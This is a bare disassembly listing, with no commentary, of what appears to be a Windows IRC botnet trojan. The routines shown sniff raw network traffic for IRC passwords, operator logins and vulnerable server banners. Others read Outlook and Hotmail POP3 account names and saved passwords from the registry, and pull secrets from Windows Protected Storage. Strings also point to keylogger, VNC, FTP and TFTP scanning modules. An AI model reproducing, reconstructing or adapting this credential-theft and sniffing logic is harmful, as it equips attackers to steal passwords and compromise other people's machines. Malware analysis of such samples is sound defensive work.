test eax, eax
pop ecx
jnz short loc_41573E
push offset aScan ; "[SCAN]:"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_41573E
push offset aFtp_1 ; "[FTP]:"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz loc_41573E
push offset aTftp ; "[TFTP]:"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz loc_41573E
push offset aKeylogger ; "[KEYLOGGER]:"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz loc_41573E
push offset aVnc ; "[VNC]:"
push esi
call sub_4235C0
neg eax
pop ecx
sbb eax, eax
pop ecx
neg eax
pop esi
retn
sub_415702 endp
; =============== S U B R O U T I N E =======================================
sub_41580E proc near ; CODE XREF: sub_415A65:loc_415CB6�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aM7pC1xaudb1ty8 ; "m7P/c1xaudB1TY84s/myQpz0"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_415828
loc_415824: ; CODE XREF: sub_41580E+29�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_415828: ; CODE XREF: sub_41580E+14�j
push offset dword_439648
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_415824
push offset dword_439638
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41584F
loc_41584A: ; CODE XREF: sub_41580E+50�j
; sub_41580E+61�j ...
xor eax, eax
pop esi
inc eax
retn
; ---------------------------------------------------------------------------
loc_41584F: ; CODE XREF: sub_41580E+3A�j
push offset aIrcOperator ; "IRC Operator"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_41584A
push offset aNowANetworkAdm ; "now a network administrator"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_41584A
push offset aPrivmsg ; "PRIVMSG"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_41584A
push offset aJoin ; "JOIN"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_41584A
push offset aOper ; "OPER"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_41584A
push offset aPong ; "PONG"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_41584A
push offset aPing ; "PING"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_41584A
push offset aUserhost ; "USERHOST"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz loc_41584A
push offset aNotice ; "NOTICE"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz loc_41584A
push offset aTopic ; "TOPIC"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz loc_41584A
push offset aPass_1 ; "PASS "
push esi
call sub_4235C0
neg eax
pop ecx
sbb eax, eax
pop ecx
neg eax
pop esi
retn
sub_41580E endp
; =============== S U B R O U T I N E =======================================
sub_41591A proc near ; CODE XREF: sub_415A65:loc_415CE1�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset dword_439648
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_415934
loc_415930: ; CODE XREF: sub_41591A+29�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_415934: ; CODE XREF: sub_41591A+14�j
push offset dword_439638
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_415930
push offset aUser_0 ; "USER "
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41595B
xor eax, eax
pop esi
inc eax
retn
; ---------------------------------------------------------------------------
loc_41595B: ; CODE XREF: sub_41591A+3A�j
push offset aPass_1 ; "PASS "
push esi
call sub_4235C0
neg eax
pop ecx
sbb eax, eax
pop ecx
neg eax
pop esi
retn
sub_41591A endp
; =============== S U B R O U T I N E =======================================
sub_415970 proc near ; CODE XREF: sub_415A65:loc_415D09�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset dword_439648
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41598A
loc_415986: ; CODE XREF: sub_415970+29�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_41598A: ; CODE XREF: sub_415970+14�j
push offset dword_439638
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_415986
push offset a_bot ; "_BOT"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_4159B1
xor eax, eax
pop esi
inc eax
retn
; ---------------------------------------------------------------------------
loc_4159B1: ; CODE XREF: sub_415970+3A�j
push offset a_bot_login ; "_BOT_LOGIN"
push esi
call sub_4235C0
neg eax
pop ecx
sbb eax, eax
pop ecx
neg eax
pop esi
retn
sub_415970 endp
; =============== S U B R O U T I N E =======================================
sub_4159C6 proc near ; CODE XREF: sub_415A65:loc_415D31�p
arg_0 = dword ptr 4
push offset dword_439648
push [esp+4+arg_0]
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_4159EA
push offset dword_439638
push [esp+4+arg_0]
call sub_4235C0
pop ecx
pop ecx
loc_4159EA: ; CODE XREF: sub_4159C6+12�j
xor eax, eax
retn
sub_4159C6 endp
; =============== S U B R O U T I N E =======================================
sub_4159ED proc near ; CODE XREF: sub_415A65:loc_415D59�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset dword_439648
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_415A07
loc_415A03: ; CODE XREF: sub_4159ED+29�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_415A07: ; CODE XREF: sub_4159ED+14�j
push offset dword_439638
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_415A03
push offset aOpenssl0_9_6 ; "OpenSSL/0.9.6"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_415A2E
loc_415A29: ; CODE XREF: sub_4159ED+50�j
; sub_4159ED+61�j
xor eax, eax
pop esi
inc eax
retn
; ---------------------------------------------------------------------------
loc_415A2E: ; CODE XREF: sub_4159ED+3A�j
push offset aApache1_3 ; "Apache/1.3"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_415A29
push offset aServUFtpServer ; "Serv-U FTP Server"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_415A29
push offset aOpenssh_2 ; "OpenSSH_2"
push esi
call sub_4235C0
neg eax
pop ecx
sbb eax, eax
pop ecx
neg eax
pop esi
retn
sub_4159ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415A65 proc near ; DATA XREF: sub_403B2C+CB9�o
var_674 = byte ptr -674h
var_673 = byte ptr -673h
var_574 = dword ptr -574h
var_570 = byte ptr -570h
var_4F0 = dword ptr -4F0h
var_334 = byte ptr -334h
var_32B = byte ptr -32Bh
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_30C = byte ptr -30Ch
var_134 = byte ptr -134h
var_B4 = byte ptr -0B4h
var_34 = byte ptr -34h
var_24 = byte ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 674h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 90h
mov esi, eax
lea edi, [ebp+var_574]
push 3Fh
rep movsd
xor esi, esi
xor ebx, ebx
inc esi
pop ecx
mov [eax+0BCh], esi
mov eax, [ebp+var_574]
mov [ebp+arg_0], eax
xor eax, eax
lea edi, [ebp+var_673]
mov [ebp+var_674], bl
rep stosd
stosw
lea eax, [ebp+var_674]
push 0FFh
push eax
mov [ebp+var_20], 2
mov [ebp+var_1E], bx
mov [ebp+var_1C], ebx
call dword_454324 ; gethostname
lea eax, [ebp+var_674]
push eax
call dword_454398 ; gethostbyname
movsx ecx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
push ecx
push dword ptr [eax]
lea eax, [ebp+var_C]
push eax
call sub_4223F0
mov eax, [ebp+var_C]
add esp, 0Ch
mov [ebp+var_1C], eax
push ebx
push 3
push 2
call dword_454394 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_8], edi
jnz short loc_415B1C
push [ebp+var_4F0]
call sub_41C059
pop ecx
push ebx
call dword_42F150 ; ExitThread
loc_415B1C: ; CODE XREF: sub_415A65+A2�j
lea eax, [ebp+var_20]
push 10h
push eax
push edi
call dword_454344 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_415B48
push edi
call dword_4543AC ; closesocket
push [ebp+var_4F0]
call sub_41C059
pop ecx
push ebx
call dword_42F150 ; ExitThread
loc_415B48: ; CODE XREF: sub_415A65+C7�j
push ebx
lea eax, [ebp+var_24]
push ebx
push eax
push ebx
push ebx
lea eax, [ebp+var_10]
push 4
push eax
push 98000001h
push edi
mov [ebp+var_10], esi
call dword_4542B0 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_415B84
push edi
call dword_4543AC ; closesocket
push [ebp+var_4F0]
call sub_41C059
pop ecx
push ebx
call dword_42F150 ; ExitThread
loc_415B84: ; CODE XREF: sub_415A65+103�j
mov ecx, [ebp+arg_0]
call sub_41111B
push eax
lea eax, [ebp+var_34]
push eax
call dword_42F04C ; lstrcpyA
jmp loc_415D91
; ---------------------------------------------------------------------------
loc_415B9C: ; CODE XREF: sub_415A65+336�j
mov esi, 200h
lea eax, [ebp+var_334]
push esi
push ebx
push eax
call sub_4221F0
add esp, 0Ch
lea eax, [ebp+var_334]
push ebx
push esi
push eax
push [ebp+var_8]
call dword_454330 ; recv
cmp [ebp+var_32B], 6
jnz loc_415D91
push [ebp+var_320]
call dword_454230 ; ntohs
push [ebp+var_320+2]
movzx esi, ax
call dword_454230 ; ntohs
push [ebp+var_328]
movzx edi, ax
call sub_4156F3
add esp, 4
push dword ptr [eax]
call dword_45439C ; inet_ntoa
push eax
lea eax, [ebp+var_B4]
push offset aS_1 ; "%s"
push eax
call sub_422063
push [ebp+var_324]
call sub_4156F3
add esp, 10h
push dword ptr [eax]
call dword_45439C ; inet_ntoa
push eax
lea eax, [ebp+var_134]
push offset aS_1 ; "%s"
push eax
call sub_422063
lea eax, [ebp+var_30C]
mov [ebp+var_4], ebx
push eax
call sub_422120
add esp, 10h
test eax, eax
jbe short loc_415C84
loc_415C55: ; CODE XREF: sub_415A65+21D�j
mov eax, [ebp+var_4]
lea eax, [ebp+eax+var_30C]
cmp byte ptr [eax], 0Dh
jnz short loc_415C67
mov byte ptr [eax], 20h
loc_415C67: ; CODE XREF: sub_415A65+1FD�j
cmp byte ptr [eax], 0Ah
jnz short loc_415C6F
mov byte ptr [eax], 20h
loc_415C6F: ; CODE XREF: sub_415A65+205�j
inc [ebp+var_4]
lea eax, [ebp+var_30C]
push eax
call sub_422120
cmp [ebp+var_4], eax
pop ecx
jb short loc_415C55
loc_415C84: ; CODE XREF: sub_415A65+1EE�j
lea eax, [ebp+var_30C]
push eax
call sub_415702
test eax, eax
pop ecx
lea eax, [ebp+var_30C]
push eax
jz short loc_415CB6
lea eax, [ebp+var_134]
push edi
push eax
lea eax, [ebp+var_B4]
push esi
push eax
push offset unk_43E858
jmp loc_415D7F
; ---------------------------------------------------------------------------
loc_415CB6: ; CODE XREF: sub_415A65+235�j
call sub_41580E
test eax, eax
pop ecx
lea eax, [ebp+var_30C]
push eax
jz short loc_415CE1
lea eax, [ebp+var_134]
push edi
push eax
lea eax, [ebp+var_B4]
push esi
push eax
push offset unk_43E834
jmp loc_415D7F
; ---------------------------------------------------------------------------
loc_415CE1: ; CODE XREF: sub_415A65+260�j
call sub_41591A
test eax, eax
pop ecx
lea eax, [ebp+var_30C]
push eax
jz short loc_415D09
lea eax, [ebp+var_134]
push edi
push eax
lea eax, [ebp+var_B4]
push esi
push eax
push offset unk_43E810
jmp short loc_415D7F
; ---------------------------------------------------------------------------
loc_415D09: ; CODE XREF: sub_415A65+28B�j
call sub_415970
test eax, eax
pop ecx
lea eax, [ebp+var_30C]
push eax
jz short loc_415D31
lea eax, [ebp+var_134]
push edi
push eax
lea eax, [ebp+var_B4]
push esi
push eax
push offset unk_43E7EC
jmp short loc_415D7F
; ---------------------------------------------------------------------------
loc_415D31: ; CODE XREF: sub_415A65+2B3�j
call sub_4159C6
test eax, eax
pop ecx
lea eax, [ebp+var_30C]
push eax
jz short loc_415D59
lea eax, [ebp+var_134]
push edi
push eax
lea eax, [ebp+var_B4]
push esi
push eax
push offset dword_43E7C8
jmp short loc_415D7F
; ---------------------------------------------------------------------------
loc_415D59: ; CODE XREF: sub_415A65+2DB�j
call sub_4159ED
test eax, eax
pop ecx
jz short loc_415D91
lea eax, [ebp+var_30C]
push eax
lea eax, [ebp+var_134]
push edi
push eax
lea eax, [ebp+var_B4]
push esi
push eax
push offset dword_43E7A4
loc_415D7F: ; CODE XREF: sub_415A65+24C�j
; sub_415A65+277�j ...
lea eax, [ebp+var_570]
push eax
push [ebp+arg_0]
call sub_4104F6
add esp, 20h
loc_415D91: ; CODE XREF: sub_415A65+132�j
; sub_415A65+166�j ...
mov ecx, [ebp+arg_0]
call sub_411123
test al, al
jnz loc_415B9C
push [ebp+var_8]
call dword_4543AC ; closesocket
push [ebp+var_4F0]
call sub_41C059
pop ecx
push ebx
call dword_42F150 ; ExitThread
sub_415A65 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415DBD proc near ; DATA XREF: sub_403B2C+E64�o
var_1240 = byte ptr -1240h
var_240 = dword ptr -240h
var_23C = byte ptr -23Ch
var_1BC = dword ptr -1BCh
var_1B8 = dword ptr -1B8h
var_190 = dword ptr -190h
var_18C = dword ptr -18Ch
var_188 = dword ptr -188h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1240h
call sub_4220C0
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 90h
mov esi, eax
lea edi, [ebp+var_240]
xor ebx, ebx
rep movsd
cmp [ebp+var_1B8], ebx
mov edi, [ebp+var_240]
mov dword ptr [eax+0BCh], 1
jz short loc_415E13
push 1000h
lea eax, [ebp+var_1240]
push [ebp+var_1B8]
push eax
call sub_4222F0
add esp, 0Ch
loc_415E13: ; CODE XREF: sub_415DBD+3A�j
cmp dword_4543E8, ebx
mov esi, offset aIazcn0rzRw0xfk ; "iaZcN0Rz/rw0xfK1r.VuQwI."
jnz short loc_415E27
call sub_415EA7
jmp short loc_415E3D
; ---------------------------------------------------------------------------
loc_415E27: ; CODE XREF: sub_415DBD+61�j
push esi
lea eax, [ebp+var_23C]
push offset aSAdvapi_dllNot ; "%s Advapi.dll not loaded"
push eax
push edi
call sub_4104F6
add esp, 10h
loc_415E3D: ; CODE XREF: sub_415DBD+68�j
cmp dword_454438, ebx
jnz short loc_415E7B
push [ebp+var_190]
cmp [ebp+var_1B8], ebx
push [ebp+var_188]
push [ebp+var_18C]
jz short loc_415E78
lea eax, [ebp+var_1240]
push eax
loc_415E66: ; CODE XREF: sub_415DBD+BC�j
lea eax, [ebp+var_23C]
push edi
push eax
call sub_416208
add esp, 18h
jmp short loc_415E91
; ---------------------------------------------------------------------------
loc_415E78: ; CODE XREF: sub_415DBD+A0�j
push ebx
jmp short loc_415E66
; ---------------------------------------------------------------------------
loc_415E7B: ; CODE XREF: sub_415DBD+86�j
push esi
lea eax, [ebp+var_23C]
push offset aSPstore_dllNot ; "%s PStore.dll not loaded"
push eax
push edi
call sub_4104F6
add esp, 10h
loc_415E91: ; CODE XREF: sub_415DBD+B9�j
push [ebp+var_1BC]
call sub_41C059
pop ecx
push ebx
call dword_42F150 ; ExitThread
pop edi
pop esi
pop ebx
sub_415DBD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415EA7 proc near ; CODE XREF: sub_415DBD+63�p
var_2EC = byte ptr -2ECh
var_224 = byte ptr -224h
var_15C = byte ptr -15Ch
var_C4 = byte ptr -0C4h
var_2C = byte ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 2ECh
push ebx
push edi
xor ebx, ebx
push 3A98h
push ebx
push offset dword_458738
call sub_4221F0
mov edi, dword_42F04C
add esp, 0Ch
lea eax, [ebp+var_224]
push offset aSoftwareMicr_2 ; "Software\\Microsoft\\Internet Account Man"...
push eax
call edi ; dword_42F04C
lea eax, [ebp+var_24]
push eax
push 0F003Fh
lea eax, [ebp+var_224]
push ebx
push eax
push 80000001h
call dword_454384 ; RegOpenKeyExA
test eax, eax
jnz loc_416204
push esi
mov [ebp+var_18], ebx
mov [ebp+var_10], 3
mov esi, 96h
loc_415F0F: ; CODE XREF: sub_415EA7+356�j
lea eax, [ebp+var_2C]
mov [ebp+var_1C], 0C8h
push eax
push ebx
push ebx
lea eax, [ebp+var_1C]
push ebx
push eax
lea eax, [ebp+var_2EC]
push eax
push [ebp+var_18]
push [ebp+var_24]
call dword_454264 ; RegEnumKeyExA
mov [ebp+var_20], eax
lea eax, [ebp+var_224]
push offset aSoftwareMicr_2 ; "Software\\Microsoft\\Internet Account Man"...
push eax
call edi ; dword_42F04C
lea eax, [ebp+var_224]
push offset asc_43E8EC ; "\\"
push eax
call dword_42F0D4 ; lstrcatA
lea eax, [ebp+var_2EC]
push eax
lea eax, [ebp+var_224]
push eax
call dword_42F0D4 ; lstrcatA
lea eax, [ebp+var_14]
push eax
push 0F003Fh
lea eax, [ebp+var_224]
push ebx
push eax
push 80000001h
call dword_454384 ; RegOpenKeyExA
lea eax, [ebp+var_8]
mov [ebp+var_8], esi
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
push offset aHttpmailUserna ; "HTTPMail UserName"
push [ebp+var_14]
call dword_4541F8 ; RegQueryValueExA
test eax, eax
jnz loc_416093
lea eax, [ebp+var_15C]
push eax
mov eax, dword_45C1D0
imul eax, 12Ch
add eax, offset dword_458738
push eax
call edi ; dword_42F04C
push esi
lea eax, [ebp+var_15C]
push ebx
push eax
call sub_4221F0
mov eax, dword_45C1D0
add esp, 0Ch
imul eax, 12Ch
add eax, offset dword_458800
push offset aHotmail ; "Hotmail"
push eax
call edi ; dword_42F04C
lea eax, [ebp+var_8]
mov [ebp+var_8], esi
push eax
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
push offset aHttpmailPass2 ; "HTTPMail Pass2"
push [ebp+var_14]
call dword_4541F8 ; RegQueryValueExA
test eax, eax
jnz loc_4161DC
push 2
mov [ebp+var_C], ebx
pop eax
cmp [ebp+var_8], eax
mov [ebp+var_4], eax
jbe loc_4161C7
loc_41602E: ; CODE XREF: sub_415EA7+1E5�j
mov eax, [ebp+var_4]
mov al, [ebp+eax+var_C4]
push eax
call dword_42F248 ; IsCharAlphaNumericA
test eax, eax
jnz short loc_416061
mov eax, [ebp+var_4]
mov al, [ebp+eax+var_C4]
cmp al, 28h
jz short loc_416061
cmp al, 29h
jz short loc_416061
cmp al, 2Eh
jz short loc_416061
cmp al, 20h
jz short loc_416061
cmp al, 2Dh
jnz short loc_416083
loc_416061: ; CODE XREF: sub_415EA7+19A�j
; sub_415EA7+1A8�j ...
mov eax, dword_45C1D0
mov ecx, [ebp+var_4]
imul eax, 12Ch
mov edx, [ebp+var_C]
mov cl, [ebp+ecx+var_C4]
inc [ebp+var_C]
mov byte_45879C[eax+edx], cl
loc_416083: ; CODE XREF: sub_415EA7+1B8�j
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jb short loc_41602E
jmp loc_4161C7
; ---------------------------------------------------------------------------
loc_416093: ; CODE XREF: sub_415EA7+103�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
push offset aPop3UserName ; "POP3 User Name"
push [ebp+var_14]
call dword_4541F8 ; RegQueryValueExA
test eax, eax
jnz loc_4161F3
lea eax, [ebp+var_15C]
push eax
mov eax, dword_45C1D0
imul eax, 12Ch
add eax, offset dword_458738
push eax
call edi ; dword_42F04C
push esi
lea eax, [ebp+var_15C]
push ebx
push eax
call sub_4221F0
add esp, 0Ch
lea eax, [ebp+var_8]
mov [ebp+var_8], esi
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
push offset aPop3Server ; "POP3 Server"
push [ebp+var_14]
call dword_4541F8 ; RegQueryValueExA
lea eax, [ebp+var_15C]
push eax
mov eax, dword_45C1D0
imul eax, 12Ch
add eax, offset dword_458800
push eax
call edi ; dword_42F04C
push esi
lea eax, [ebp+var_15C]
push ebx
push eax
call sub_4221F0
add esp, 0Ch
lea eax, [ebp+var_8]
mov [ebp+var_8], esi
push eax
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
push offset aPop3Pass2 ; "POP3 Pass2"
push [ebp+var_14]
call dword_4541F8 ; RegQueryValueExA
test eax, eax
jnz loc_4161DC
push 2
mov [ebp+var_C], ebx
pop eax
cmp [ebp+var_8], eax
mov [ebp+var_4], eax
jbe short loc_4161C7
loc_416167: ; CODE XREF: sub_415EA7+31E�j
mov eax, [ebp+var_4]
mov al, [ebp+eax+var_C4]
push eax
call dword_42F248 ; IsCharAlphaNumericA
test eax, eax
jnz short loc_41619A
mov eax, [ebp+var_4]
mov al, [ebp+eax+var_C4]
cmp al, 28h
jz short loc_41619A
cmp al, 29h
jz short loc_41619A
cmp al, 2Eh
jz short loc_41619A
cmp al, 20h
jz short loc_41619A
cmp al, 2Dh
jnz short loc_4161BC
loc_41619A: ; CODE XREF: sub_415EA7+2D3�j
; sub_415EA7+2E1�j ...
mov eax, dword_45C1D0
mov ecx, [ebp+var_4]
imul eax, 12Ch
mov edx, [ebp+var_C]
mov cl, [ebp+ecx+var_C4]
inc [ebp+var_C]
mov byte_45879C[eax+edx], cl
loc_4161BC: ; CODE XREF: sub_415EA7+2F1�j
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jb short loc_416167
loc_4161C7: ; CODE XREF: sub_415EA7+181�j
; sub_415EA7+1E7�j ...
mov eax, dword_45C1D0
mov ecx, [ebp+var_C]
imul eax, 12Ch
mov byte_45879C[eax+ecx], bl
loc_4161DC: ; CODE XREF: sub_415EA7+16F�j
; sub_415EA7+2AC�j
push esi
lea eax, [ebp+var_C4]
push ebx
push eax
call sub_4221F0
add esp, 0Ch
inc dword_45C1D0
loc_4161F3: ; CODE XREF: sub_415EA7+20C�j
inc [ebp+var_18]
cmp [ebp+var_20], 103h
jnz loc_415F0F
pop esi
loc_416204: ; CODE XREF: sub_415EA7+52�j
pop edi
pop ebx
leave
retn
sub_415EA7 endp
; =============== S U B R O U T I N E =======================================
sub_416208 proc near ; CODE XREF: sub_415DBD+B1�p
mov eax, offset loc_42EF20
call sub_423A68
sub esp, 0DF0h
push ebx
push esi
push edi
push offset aProtectedstora ; "ProtectedStorage"
call sub_41F7BE
test eax, eax
pop ecx
jnz short loc_416277
xor edi, edi
mov ebx, offset aIazcn0rzRw0xfk ; "iaZcN0Rz/rw0xfK1r.VuQwI."
cmp [ebp+14h], edi
mov esi, offset aSPstoreNotRunn ; "%s PStore not running."
jnz short loc_416259
cmp [ebp+18h], edi
jnz short loc_416262
cmp [ebp+1Ch], edi
jz loc_416378
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_4104F6
add esp, 10h
loc_416259: ; CODE XREF: sub_416208+31�j
cmp [ebp+18h], edi
jz loc_416378
loc_416262: ; CODE XREF: sub_416208+36�j
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_410491
add esp, 10h
jmp loc_416378
; ---------------------------------------------------------------------------
loc_416277: ; CODE XREF: sub_416208+20�j
call sub_41F76B
xor edi, edi
mov [ebp-14h], edi
push edi
push edi
lea eax, [ebp-10h]
push edi
push eax
mov [ebp-4], edi
mov [ebp-10h], edi
call dword_4542EC
cmp eax, edi
jge short loc_4162E3
cmp [ebp+14h], edi
mov ebx, offset aIazcn0rzRw0xfk ; "iaZcN0Rz/rw0xfK1r.VuQwI."
mov esi, offset aSPstorecreatei ; "%s PStoreCreateInstance() error."
jnz short loc_4162C5
cmp [ebp+18h], edi
jnz short loc_4162CE
cmp [ebp+1Ch], edi
jz loc_416367
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_4104F6
add esp, 10h
loc_4162C5: ; CODE XREF: sub_416208+9D�j
cmp [ebp+18h], edi
jz loc_416367
loc_4162CE: ; CODE XREF: sub_416208+A2�j
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_410491
add esp, 10h
jmp loc_416367
; ---------------------------------------------------------------------------
loc_4162E3: ; CODE XREF: sub_416208+8E�j
cmp [ebp-10h], edi
mov byte ptr [ebp-4], 1
mov [ebp-20h], edi
jnz short loc_4162F9
push 80004003h
call sub_421E08
loc_4162F9: ; CODE XREF: sub_416208+E5�j
mov esi, [ebp-10h]
lea ecx, [ebp-20h]
push ecx
push edi
mov eax, [esi]
push edi
push esi
call dword ptr [eax+38h]
cmp eax, edi
jge short loc_41637F
push offset dword_43EA94
push esi
push eax
call sub_421E16
cmp [ebp+14h], edi
mov ebx, offset aIazcn0rzRw0xfk ; "iaZcN0Rz/rw0xfK1r.VuQwI."
mov esi, offset aSFailedToQue_1 ; "%s Failed to query PStore."
jnz short loc_416341
cmp [ebp+18h], edi
jnz short loc_416346
cmp [ebp+1Ch], edi
jz short loc_416356
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_4104F6
add esp, 10h
loc_416341: ; CODE XREF: sub_416208+11D�j
cmp [ebp+18h], edi
jz short loc_416356
loc_416346: ; CODE XREF: sub_416208+122�j
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_410491
add esp, 10h
loc_416356: ; CODE XREF: sub_416208+127�j
; sub_416208+13C�j
mov eax, [ebp-20h]
and byte ptr [ebp-4], 0
cmp eax, edi
jz short loc_416367
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_416367: ; CODE XREF: sub_416208+A7�j
; sub_416208+C0�j ...
mov eax, [ebp-10h]
or dword ptr [ebp-4], 0FFFFFFFFh
cmp eax, edi
jz short loc_416378
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_416378: ; CODE XREF: sub_416208+3B�j
; sub_416208+54�j ...
xor eax, eax
jmp loc_416B3D
; ---------------------------------------------------------------------------
loc_41637F: ; CODE XREF: sub_416208+102�j
mov ebx, offset aIazcn0rzRw0xfk ; "iaZcN0Rz/rw0xfK1r.VuQwI."
loc_416384: ; CODE XREF: sub_416208+8C1�j
; sub_416208+8CD�j
xor edi, edi
cmp [ebp-20h], edi
jnz short loc_416395
push 80004003h
call sub_421E08
loc_416395: ; CODE XREF: sub_416208+181�j
mov eax, [ebp-20h]
lea edx, [ebp-40h]
push edi
push edx
mov ecx, [eax]
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jnz loc_416ADA
sub esp, 10h
lea esi, [ebp-40h]
mov edi, esp
lea eax, [ebp-84h]
movsd
movsd
movsd
push offset asc_43EA74 ; "%x"
push eax
movsd
call dword_42F24C ; wsprintfA
add esp, 18h
and dword ptr [ebp-2Ch], 0
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 2
jnz short loc_4163E6
push 80004003h
call sub_421E08
loc_4163E6: ; CODE XREF: sub_416208+1D2�j
mov esi, [ebp-10h]
lea ecx, [ebp-2Ch]
push ecx
lea ecx, [ebp-40h]
mov eax, [esi]
push 0
push ecx
push 0
push esi
call dword ptr [eax+3Ch]
test eax, eax
jge short loc_41640B
push offset dword_43EA94
push esi
push eax
call sub_421E16
loc_41640B: ; CODE XREF: sub_416208+1F5�j
mov edi, dword_42F04C
loc_416411: ; CODE XREF: sub_416208+8A7�j
; sub_416208+8B3�j
xor esi, esi
cmp [ebp-2Ch], esi
jnz short loc_416422
push 80004003h
call sub_421E08
loc_416422: ; CODE XREF: sub_416208+20E�j
mov eax, [ebp-2Ch]
lea edx, [ebp-50h]
push esi
push edx
mov ecx, [eax]
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jnz loc_416AC0
cmp [ebp-10h], esi
mov byte ptr [ebp-4], 3
mov [ebp-28h], esi
jnz short loc_416450
push 80004003h
call sub_421E08
loc_416450: ; CODE XREF: sub_416208+23C�j
mov esi, [ebp-10h]
lea ecx, [ebp-28h]
push ecx
lea ecx, [ebp-50h]
mov eax, [esi]
push 0
push ecx
lea ecx, [ebp-40h]
push ecx
push 0
push esi
call dword ptr [eax+54h]
test eax, eax
jge short loc_416479
push offset dword_43EA94
push esi
push eax
call sub_421E16
loc_416479: ; CODE XREF: sub_416208+263�j
; sub_416208+899�j
xor esi, esi
cmp [ebp-28h], esi
jnz short loc_41648A
push 80004003h
call sub_421E08
loc_41648A: ; CODE XREF: sub_416208+276�j
mov eax, [ebp-28h]
lea edx, [ebp-30h]
push esi
push edx
mov ecx, [eax]
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
